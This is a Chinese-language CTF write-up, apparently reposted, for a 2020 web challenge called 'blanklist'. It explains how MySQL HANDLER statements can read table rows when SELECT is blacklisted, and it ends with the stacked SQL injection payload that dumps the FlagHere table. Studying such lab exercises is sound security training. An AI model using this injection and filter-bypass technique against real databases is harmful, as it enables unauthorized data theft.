[原题复现][2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入handler绕过)
Posted 笑花大王
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[原题复现][2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入handler绕过)相关的知识,希望对你有一定的参考价值。
简介
今天参加i春秋新春抗疫赛 一道web没整出来 啊啊啊 好垃圾啊啊啊啊啊啊啊 晚上看群里赵师傅的buuoj平台太屌了分分钟上线 然后赵师傅还分享了思路用handler语句绕过select过滤。。。。
原题复现:
考察知识点:SQL注入漏洞-堆叠注入、注入绕过
线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题
简介
基础思路参考:https://www.cnblogs.com/xhds/p/12269987.html
与上述例子不同的地方就是黑名单过滤 过滤了我的知识范围之内所有能用的 各种绕过都不行 赛后才看大佬们分享用handler handler 卧槽我都没听过 啊啊啊啊啊好垃圾!垃圾!
handler语句代替select查询
mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。
语法结构: HANDLER tbl_name OPEN [ [AS] alias] HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...) [ WHERE where_condition ] [LIMIT ... ] HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST } [ WHERE where_condition ] [LIMIT ... ] HANDLER tbl_name READ { FIRST | NEXT } [ WHERE where_condition ] [LIMIT ... ] HANDLER tbl_name CLOSE
如:通过handler语句查询users表的内容
handler users open as yunensec; #指定数据表进行载入并将返回句柄重命名 handler yunensec read first; #读取指定表/句柄的首行数据 handler yunensec read next; #读取指定表/句柄的下一行数据 handler yunensec read next; #读取指定表/句柄的下一行数据 ... handler yunensec close; #关闭句柄
引用:https://xz.aliyun.com/t/7169#toc-47
这道题的最终payload:
1\';handler FlagHere open;handler FlagHere read first;#
以上是关于[原题复现][2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入handler绕过)的主要内容,如果未能解决你的问题,请参考以下文章
[原题复现]SUCTF 2019 WEB EasySQL(堆叠注入)
安全-Wordpress 小于等于4.6.1版本任意代码执行漏洞复现(i春秋)